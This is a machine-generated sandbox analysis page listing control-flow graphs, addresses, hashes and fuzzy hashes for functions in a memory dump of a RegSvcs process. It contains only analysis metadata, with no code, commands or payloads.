                                                            control_flow_graph 2504 15f86f8-15f8720 2508 15f875b-15f877c 2504->2508 2509 15f8722-15f872f 2504->2509 2515 15f8781-15f8784 2508->2515 2512 15f8751-15f8754 2509->2512 2514 15f8756 2512->2514 2512->2515 2514->2508 2516 15f8786-15f87ac 2515->2516 2517 15f87b1-15f87b4 2515->2517 2516->2517 2519 15f87b6-15f87dc 2517->2519 2520 15f87e1-15f87e4 2517->2520 2519->2520 2521 15f87ff-15f8802 2520->2521 2522 15f87e6-15f87f2 2520->2522 2524 15f882f-15f8832 2521->2524 2525 15f8804-15f882a 2521->2525 2536 15f87fa 2522->2536 2527 15f885f-15f8862 2524->2527 2528 15f8834-15f885a 2524->2528 2525->2524 2532 15f886f-15f8872 2527->2532 2533 15f8864 2527->2533 2528->2527 2538 15f889f-15f88a2 2532->2538 2539 15f8874-15f889a 2532->2539 2543 15f886a 2533->2543 2536->2521 2541 15f88cf-15f88d2 2538->2541 2542 15f88a4-15f88ca 2538->2542 2539->2538 2547 15f88ff-15f8902 2541->2547 2548 15f88d4-15f88fa 2541->2548 2542->2541 2543->2532 2550 15f892f-15f8932 2547->2550 2551 15f8904-15f892a 2547->2551 2548->2547 2556 15f895f-15f8962 2550->2556 2557 15f8934-15f895a 2550->2557 2551->2550 2558 15f898f-15f8992 2556->2558 2559 15f8964-15f898a 2556->2559 2557->2556 2565 15f8994-15f8996 2558->2565 2566 15f89a3-15f89a6 2558->2566 2559->2558 2724 15f8998 call 15fa033 2565->2724 2725 15f8998 call 15f9f81 2565->2725 2726 15f8998 call 15f9f90 2565->2726 2567 15f89a8-15f89ce 2566->2567 2568 15f89d3-15f89d6 2566->2568 2567->2568 2575 15f89d8-15f89fe 2568->2575 2576 15f8a03-15f8a06 2568->2576 2572 15f899e 2572->2566 2575->2576 2577 15f8a08-15f8a2e 2576->2577 2578 15f8a33-15f8a36 2576->2578 2577->2578 2583 15f8a38-15f8a5e 2578->2583 2584 15f8a63-15f8a66 2578->2584 2583->2584 2586 15f8a68-15f8a8e 2584->2586 2587 15f8a93-15f8a96 2584->2587 2586->2587 2591 15f8a98-15f8abe 2587->2591 2592 15f8ac3-15f8ac6 2587->2592 2591->2592 2595 15f8ac8-15f8aee 2592->2595 2596 15f8af3-15f8af6 2592->2596 2595->2596 2601 15f8af8-15f8b1e 2596->2601 2602 15f8b23-15f8b26 2596->2602 2601->2602 2605 15f8b28-15f8b4e 2602->2605 2606 15f8b53-15f8b56 2602->2606 2605->2606 2611 15f8b58-15f8b6e 2606->2611 2612 15f8b73-15f8b76 2606->2612 2611->2612 2615 15f8b78-15f8b9e 2612->2615 2616 15f8ba3-15f8ba6 2612->2616 2615->2616 2621 15f8ba8-15f8bce 2616->2621 2622 15f8bd3-15f8bd6 2616->2622 2621->2622 2625 15f8bd8-15f8bfe 2622->2625 2626 15f8c03-15f8c06 2622->2626 2625->2626 2631 15f8c08-15f8c2e 2626->2631 2632 15f8c33-15f8c36 2626->2632 2631->2632 2635 15f8c38-15f8c5e 2632->2635 2636 15f8c63-15f8c66 2632->2636 2635->2636 2640 15f8c68-15f8c8e 2636->2640 2641 15f8c93-15f8c96 2636->2641 2640->2641 2644 15f8c98-15f8cbe 2641->2644 2645 15f8cc3-15f8cc6 2641->2645 2644->2645 2649 15f8cc8-15f8cee 2645->2649 2650 15f8cf3-15f8cf6 2645->2650 2649->2650 2654 15f8cf8-15f8d1e 2650->2654 2655 15f8d23-15f8d26 2650->2655 2654->2655 2659 15f8d28-15f8d4e 2655->2659 2660 15f8d53-15f8d56 2655->2660 2659->2660 2664 15f8d58-15f8d7e 2660->2664 2665 15f8d83-15f8d86 2660->2665 2664->2665 2669 15f8d88-15f8dae 2665->2669 2670 15f8db3-15f8db6 2665->2670 2669->2670 2674 15f8db8-15f8dde 2670->2674 2675 15f8de3-15f8de6 2670->2675 2674->2675 2679 15f8de8-15f8e0e 2675->2679 2680 15f8e13-15f8e16 2675->2680 2679->2680 2684 15f8e18-15f8e3e 2680->2684 2685 15f8e43-15f8e46 2680->2685 2684->2685 2689 15f8e48-15f8e6e 2685->2689 2690 15f8e73-15f8e76 2685->2690 2689->2690 2694 15f8e78-15f8e9e 2690->2694 2695 15f8ea3-15f8ea6 2690->2695 2694->2695 2699 15f8ea8-15f8ece 2695->2699 2700 15f8ed3-15f8ed6 2695->2700 2699->2700 2704 15f8ed8-15f8efe 2700->2704 2705 15f8f03-15f8f05 2700->2705 2704->2705 2709 15f8f0c-15f8f0f 2705->2709 2710 15f8f07 2705->2710 2709->2512 2717 15f8f15-15f8f1b 2709->2717 2710->2709 2724->2572 2725->2572 2726->2572
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f178f2abf8ff8361ef18bc01f526fe98df525455a4209ceaebbbd96b12c082a
                                                            • Instruction ID: e45289daeabf2e8c971e3ebe26ed85134816dafaaf8aa95cb7eba101faadb2db
                                                            • Opcode Fuzzy Hash: 6f178f2abf8ff8361ef18bc01f526fe98df525455a4209ceaebbbd96b12c082a
                                                            • Instruction Fuzzy Hash: 38226030B002028BDB1AAB3CE55466D37A2FBC9314B24696DD106DF356CFB9DC878B95
                                                            Function 015F8738 Relevance: .6, Instructions: 556COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2727 15f8738-15f874f 2728 15f8751-15f8754 2727->2728 2729 15f8756-15f877c 2728->2729 2730 15f8781-15f8784 2728->2730 2729->2730 2731 15f8786-15f87ac 2730->2731 2732 15f87b1-15f87b4 2730->2732 2731->2732 2734 15f87b6-15f87dc 2732->2734 2735 15f87e1-15f87e4 2732->2735 2734->2735 2736 15f87ff-15f8802 2735->2736 2737 15f87e6-15f87f2 2735->2737 2740 15f882f-15f8832 2736->2740 2741 15f8804-15f882a 2736->2741 2754 15f87fa 2737->2754 2744 15f885f-15f8862 2740->2744 2745 15f8834-15f885a 2740->2745 2741->2740 2749 15f886f-15f8872 2744->2749 2750 15f8864 2744->2750 2745->2744 2756 15f889f-15f88a2 2749->2756 2757 15f8874-15f889a 2749->2757 2761 15f886a 2750->2761 2754->2736 2759 15f88cf-15f88d2 2756->2759 2760 15f88a4-15f88ca 2756->2760 2757->2756 2765 15f88ff-15f8902 2759->2765 2766 15f88d4-15f88fa 2759->2766 2760->2759 2761->2749 2768 15f892f-15f8932 2765->2768 2769 15f8904-15f892a 2765->2769 2766->2765 2774 15f895f-15f8962 2768->2774 2775 15f8934-15f895a 2768->2775 2769->2768 2776 15f898f-15f8992 2774->2776 2777 15f8964-15f898a 2774->2777 2775->2774 2783 15f8994-15f8996 2776->2783 2784 15f89a3-15f89a6 2776->2784 2777->2776 2942 15f8998 call 15fa033 2783->2942 2943 15f8998 call 15f9f81 2783->2943 2944 15f8998 call 15f9f90 2783->2944 2785 15f89a8-15f89ce 2784->2785 2786 15f89d3-15f89d6 2784->2786 2785->2786 2793 15f89d8-15f89fe 2786->2793 2794 15f8a03-15f8a06 2786->2794 2790 15f899e 2790->2784 2793->2794 2795 15f8a08-15f8a2e 2794->2795 2796 15f8a33-15f8a36 2794->2796 2795->2796 2801 15f8a38-15f8a5e 2796->2801 2802 15f8a63-15f8a66 2796->2802 2801->2802 2804 15f8a68-15f8a8e 2802->2804 2805 15f8a93-15f8a96 2802->2805 2804->2805 2809 15f8a98-15f8abe 2805->2809 2810 15f8ac3-15f8ac6 2805->2810 2809->2810 2813 15f8ac8-15f8aee 2810->2813 2814 15f8af3-15f8af6 2810->2814 2813->2814 2819 15f8af8-15f8b1e 2814->2819 2820 15f8b23-15f8b26 2814->2820 2819->2820 2823 15f8b28-15f8b4e 2820->2823 2824 15f8b53-15f8b56 2820->2824 2823->2824 2829 15f8b58-15f8b6e 2824->2829 2830 15f8b73-15f8b76 2824->2830 2829->2830 2833 15f8b78-15f8b9e 2830->2833 2834 15f8ba3-15f8ba6 2830->2834 2833->2834 2839 15f8ba8-15f8bce 2834->2839 2840 15f8bd3-15f8bd6 2834->2840 2839->2840 2843 15f8bd8-15f8bfe 2840->2843 2844 15f8c03-15f8c06 2840->2844 2843->2844 2849 15f8c08-15f8c2e 2844->2849 2850 15f8c33-15f8c36 2844->2850 2849->2850 2853 15f8c38-15f8c5e 2850->2853 2854 15f8c63-15f8c66 2850->2854 2853->2854 2858 15f8c68-15f8c8e 2854->2858 2859 15f8c93-15f8c96 2854->2859 2858->2859 2862 15f8c98-15f8cbe 2859->2862 2863 15f8cc3-15f8cc6 2859->2863 2862->2863 2867 15f8cc8-15f8cee 2863->2867 2868 15f8cf3-15f8cf6 2863->2868 2867->2868 2872 15f8cf8-15f8d1e 2868->2872 2873 15f8d23-15f8d26 2868->2873 2872->2873 2877 15f8d28-15f8d4e 2873->2877 2878 15f8d53-15f8d56 2873->2878 2877->2878 2882 15f8d58-15f8d7e 2878->2882 2883 15f8d83-15f8d86 2878->2883 2882->2883 2887 15f8d88-15f8dae 2883->2887 2888 15f8db3-15f8db6 2883->2888 2887->2888 2892 15f8db8-15f8dde 2888->2892 2893 15f8de3-15f8de6 2888->2893 2892->2893 2897 15f8de8-15f8e0e 2893->2897 2898 15f8e13-15f8e16 2893->2898 2897->2898 2902 15f8e18-15f8e3e 2898->2902 2903 15f8e43-15f8e46 2898->2903 2902->2903 2907 15f8e48-15f8e6e 2903->2907 2908 15f8e73-15f8e76 2903->2908 2907->2908 2912 15f8e78-15f8e9e 2908->2912 2913 15f8ea3-15f8ea6 2908->2913 2912->2913 2917 15f8ea8-15f8ece 2913->2917 2918 15f8ed3-15f8ed6 2913->2918 2917->2918 2922 15f8ed8-15f8efe 2918->2922 2923 15f8f03-15f8f05 2918->2923 2922->2923 2927 15f8f0c-15f8f0f 2923->2927 2928 15f8f07 2923->2928 2927->2728 2935 15f8f15-15f8f1b 2927->2935 2928->2927 2942->2790 2943->2790 2944->2790
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 381447e6712b286273f395eac9b04578060340889c47289e94c270aac5eade77
                                                            • Instruction ID: bf9f3c2e61245185f19352a94d1928efb314a7b004478d595b32edb5837695ad
                                                            • Opcode Fuzzy Hash: 381447e6712b286273f395eac9b04578060340889c47289e94c270aac5eade77
                                                            • Instruction Fuzzy Hash: 01126D70B002038BDB1AAB3CE55466D37A6FBC9314B20696DD106DB355CFB9EC878B91
                                                            Function 015FA20F Relevance: .4, Instructions: 393COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf22836dbf2b7c14af46fc848145972a2e2ac6e1170826caaad064d37f398894
                                                            • Instruction ID: dc7cd3f37cdc2162199953dedaeb58f96766328eb9eb4bc67e936ad7a6d84ecb
                                                            • Opcode Fuzzy Hash: cf22836dbf2b7c14af46fc848145972a2e2ac6e1170826caaad064d37f398894
                                                            • Instruction Fuzzy Hash: 4BE16074B012058FDF15DB68D588A6DBBB2FF88310F208929E60ADB355DB35ED42CB91
                                                            Function 015F4A7E Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 17b9532040a7a5b05e2c3d7225728c2ee28602f4df316f221aa751d97ddd0eb6
                                                            • Instruction ID: 08eb8b2898810a099467d9065a535e57f63101408a19b921c78d6fc709fb4889
                                                            • Opcode Fuzzy Hash: 17b9532040a7a5b05e2c3d7225728c2ee28602f4df316f221aa751d97ddd0eb6
                                                            • Instruction Fuzzy Hash: 69B14970E006198FDF10CFA9C8957AEBBF2BF88714F14852DD915EB294EB749845CB81
                                                            Function 015F7C84 Relevance: .2, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ebc5532e62b80b1b0aa9f703a42acdc66e0fd304a26cdf047a9370964ee8db70
                                                            • Instruction ID: de7132dc16c0567327e5fc222cc861c1dc03f85a43dc1db62a64c3cad1dccd64
                                                            • Opcode Fuzzy Hash: ebc5532e62b80b1b0aa9f703a42acdc66e0fd304a26cdf047a9370964ee8db70
                                                            • Instruction Fuzzy Hash: B1315C31E1125A9FDB15CF78C8547AEB7B2FF8A300F60855AEA01EB291D7709D42CB50
                                                            Function 015F6ED2 Relevance: .2, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1bc33756bffdf8d0774fc0d0d8744aef40d8260b58e8074714ffc4ebd0d60d37
                                                            • Instruction ID: 14c1be7f3bacbd4ec9a7b0c9fa759f0f4f963b2f51a1e883f5ddfe1a09430d9e
                                                            • Opcode Fuzzy Hash: 1bc33756bffdf8d0774fc0d0d8744aef40d8260b58e8074714ffc4ebd0d60d37
                                                            • Instruction Fuzzy Hash: 84514834B002158FDB14DB79C558AAE7BB6BF8D700F2044ADE606EF3A1DA759C41CBA1
                                                            Function 015FDD82 Relevance: .2, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b851a6e9cfe901e8b46837f473d7474c58471b00be6dd1265f594602339b83dc
                                                            • Instruction ID: 3b7bea58efc1dec58f380037b01a06395b5f682bb312425e55dc762c6f3f61b4
                                                            • Opcode Fuzzy Hash: b851a6e9cfe901e8b46837f473d7474c58471b00be6dd1265f594602339b83dc
                                                            • Instruction Fuzzy Hash: 21516D717002169FDB15CF68C880B6EB7B6FF84310F258669E515DB29ACB71EC82C791
                                                            Function 015FA6C8 Relevance: .1, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 64587a305f8ee1c8093ac9f9c63793c22c3dd1c7997e161dde542dc2ccc2cd26
                                                            • Instruction ID: 0a956c3d0a6bbc12b7e6b5aac2b153d4fbc3fb7814b571f96b52039208689074
                                                            • Opcode Fuzzy Hash: 64587a305f8ee1c8093ac9f9c63793c22c3dd1c7997e161dde542dc2ccc2cd26
                                                            • Instruction Fuzzy Hash: A2511975A012059FDB04DF69E884B9DFBB2FF88310F14C26AEA089F256E7709945CB91
                                                            Function 015F6CD4 Relevance: .1, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd9e290ef528d0987bc72d63da2320a887287a8d6b6ecd554f9e43559b93d5f2
                                                            • Instruction ID: 258c4a4314ee50e97d365aa00bd8d055128319e5f0b0a24a652fb0610e14d174
                                                            • Opcode Fuzzy Hash: cd9e290ef528d0987bc72d63da2320a887287a8d6b6ecd554f9e43559b93d5f2
                                                            • Instruction Fuzzy Hash: 2C5113B1D002188FDB18CFA9C884B9EBBB1BF48314F14852EE915BB391D774A844CF95
                                                            Function 015F6CE0 Relevance: .1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e5f60e5b83eab90dd3c63438bc37b94fd51af95d381ea5985ec0037efe97ba7
                                                            • Instruction ID: 2faf46cc15b5de7cd7f22d362125b35c3a551827af6a2d5eed234b3a8a33bc45
                                                            • Opcode Fuzzy Hash: 4e5f60e5b83eab90dd3c63438bc37b94fd51af95d381ea5985ec0037efe97ba7
                                                            • Instruction Fuzzy Hash: B25102B1E002188FDB18DFA9D884B9EBBB1BF48314F14852EE915BB391D774A844CF95
                                                            Function 015F112A Relevance: .1, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: beb60a6a24495e6fb8cc995ee73d529c64cc839c81d3899bdef9130d25d3979d
                                                            • Instruction ID: 1eb719d9bb006d71949390d5ed5f9be0d9eb3164a2fb2ef3896f1072e29b968c
                                                            • Opcode Fuzzy Hash: beb60a6a24495e6fb8cc995ee73d529c64cc839c81d3899bdef9130d25d3979d
                                                            • Instruction Fuzzy Hash: C4519E30205286CFD719DF2AFA809683FB5FB9930175492ADD1105B266DAB86D87CF82
                                                            Function 015F1138 Relevance: .1, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6cd9d714d95ea40065032769b9f0bc396e24297761c8aa30cf5d43ddcb28f172
                                                            • Instruction ID: c83e8635fd71dd3ea639dfe039e5636e314ad1fb59e66239e377591d4393b82c
                                                            • Opcode Fuzzy Hash: 6cd9d714d95ea40065032769b9f0bc396e24297761c8aa30cf5d43ddcb28f172
                                                            • Instruction Fuzzy Hash: B3517D30201247CFD719DF2AFA809583FB5FBD9301754A2ADD1145B266DAB82D87CF82
                                                            Function 015F7D90 Relevance: .1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10701c3f0dc16f0dc601020b6cad77e233131271e541d67fe3b446d4f0c1e1d2
                                                            • Instruction ID: f1c497d500b11a88330919bf541cd579cef5d74e90154d8f484c0c7fc1963b54
                                                            • Opcode Fuzzy Hash: 10701c3f0dc16f0dc601020b6cad77e233131271e541d67fe3b446d4f0c1e1d2
                                                            • Instruction Fuzzy Hash: 88316D31E0021A9FEB19DF78D4447AEB7B2FF89314F50892AE602EB251D7709D86CB50
                                                            Function 015F26CE Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f5d4bd74f0d8ecb26bdca504e9d25addbd257789808155219a512392b919e59
                                                            • Instruction ID: 62279b3841cf58d2ba0d201c0809f1682508db4732178f2a8e0608fbedc129c1
                                                            • Opcode Fuzzy Hash: 9f5d4bd74f0d8ecb26bdca504e9d25addbd257789808155219a512392b919e59
                                                            • Instruction Fuzzy Hash: 98410EB090030DDFDB10DFA9C880ADEBBF5FF48310F148029E909AB254DB74A946CB90
                                                            Function 015F5089 Relevance: .1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: af9bb981fedd9e1dcd1129bda26af6b4f0293730046e7a7a0c570fb1b7ba5dd3
                                                            • Instruction ID: 47f136390a3c8fa415bf38e615e72f43027d74362aba7530971c70d54deb07c2
                                                            • Opcode Fuzzy Hash: af9bb981fedd9e1dcd1129bda26af6b4f0293730046e7a7a0c570fb1b7ba5dd3
                                                            • Instruction Fuzzy Hash: 79313830B00255CFDB25EB79C594AAE77F6BF89204F5005ACD641AF390EB3AAC41CB91
                                                            Function 015F26D8 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba728d476c185bd9a0140be201db45e1164451d66f74f8d2579c109963609b61
                                                            • Instruction ID: 43622b4d3c04f5e53d315ffddae6515ddad7b94aff0766ef261b1bb98125ceb6
                                                            • Opcode Fuzzy Hash: ba728d476c185bd9a0140be201db45e1164451d66f74f8d2579c109963609b61
                                                            • Instruction Fuzzy Hash: 5A41EDB0901349DFDB10DFA9C984A9EBBF5BF48310F208429E909AB254DB75A945CB90
                                                            Function 015F5098 Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: da29282f209e8c829da4503be43b115f1741ea214e87e469d2e9ac3d984d2a30
                                                            • Instruction ID: d71fa5171a24eb9368364193d493a573d82d6f9c83fac59457f977dfd6b120fe
                                                            • Opcode Fuzzy Hash: da29282f209e8c829da4503be43b115f1741ea214e87e469d2e9ac3d984d2a30
                                                            • Instruction Fuzzy Hash: 60313A34B10215CFDB25EB79C554AAE77F6BF89204F1004ACD641AF390EB3A9D41CB91
                                                            Function 015FA080 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7d1b7a05ba3b667e72fe37a02209fbef17e8ba66b07f025ed58bc28c63f0fa4
                                                            • Instruction ID: 3a28e22686495074340c6a30705434e14c5416d340cf47810ddc3cd393b93748
                                                            • Opcode Fuzzy Hash: e7d1b7a05ba3b667e72fe37a02209fbef17e8ba66b07f025ed58bc28c63f0fa4
                                                            • Instruction Fuzzy Hash: 98319530E1020A9BDB15CF69D850A9EFBB6FF89300F15C619E909EF345DB709942CB91
                                                            Function 015FA856 Relevance: .1, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43c16c462cbf800b35440d0204631c65c9cdf528e1a686d37619dc1226b771b8
                                                            • Instruction ID: 0ee1f0d98732fc44320ce3746b5b53c2744b17475576399835a46607929fdd13
                                                            • Opcode Fuzzy Hash: 43c16c462cbf800b35440d0204631c65c9cdf528e1a686d37619dc1226b771b8
                                                            • Instruction Fuzzy Hash: D721C435A101058FEB14DB79C954BAE7BF6FF88714F118129E205EB3A0DA718D418BA1
                                                            Function 015FA090 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4456f69d12d5da462ad558d6235dd2bd31e4a0e77fdac49d4810b3cebac9ac37
                                                            • Instruction ID: a9dcd59c7f0ed6d265ce20013283bb81a13bf5db4998b6f0cba51c7a0a027066
                                                            • Opcode Fuzzy Hash: 4456f69d12d5da462ad558d6235dd2bd31e4a0e77fdac49d4810b3cebac9ac37
                                                            • Instruction Fuzzy Hash: D1217170E1020A9BDB15CF69D850A9EF7B6FF89300F10C619E909EB341DB709982CB91
                                                            Function 015F136F Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 417af490ab3f66de4d15c9879920945a79c3f48223101624882ba8e265cf31f1
                                                            • Instruction ID: dae35d9fcfa8c11ec5829d26204145bc9bf645da20500e3bdfe6ad4c40d88070
                                                            • Opcode Fuzzy Hash: 417af490ab3f66de4d15c9879920945a79c3f48223101624882ba8e265cf31f1
                                                            • Instruction Fuzzy Hash: 28219F70600614CFEB36AB6CD4D836D3B61FB46315F04082DEA06DF785DA69DC89C752
                                                            Function 015F1690 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 179e651205cb0b4ff65773a12b5c35b1f68d3c8b37fa3cd484993cc78ddcbdf7
                                                            • Instruction ID: e0df20411841346bcce2aa459f7d990a97993c5929d062a6f6e69ce31ae477fd
                                                            • Opcode Fuzzy Hash: 179e651205cb0b4ff65773a12b5c35b1f68d3c8b37fa3cd484993cc78ddcbdf7
                                                            • Instruction Fuzzy Hash: 3621B030601506CFEB26DB28E8C475D3B72FB85314F14196DE60ACF256DA38DC85CB91
                                                            Function 015F4F78 Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
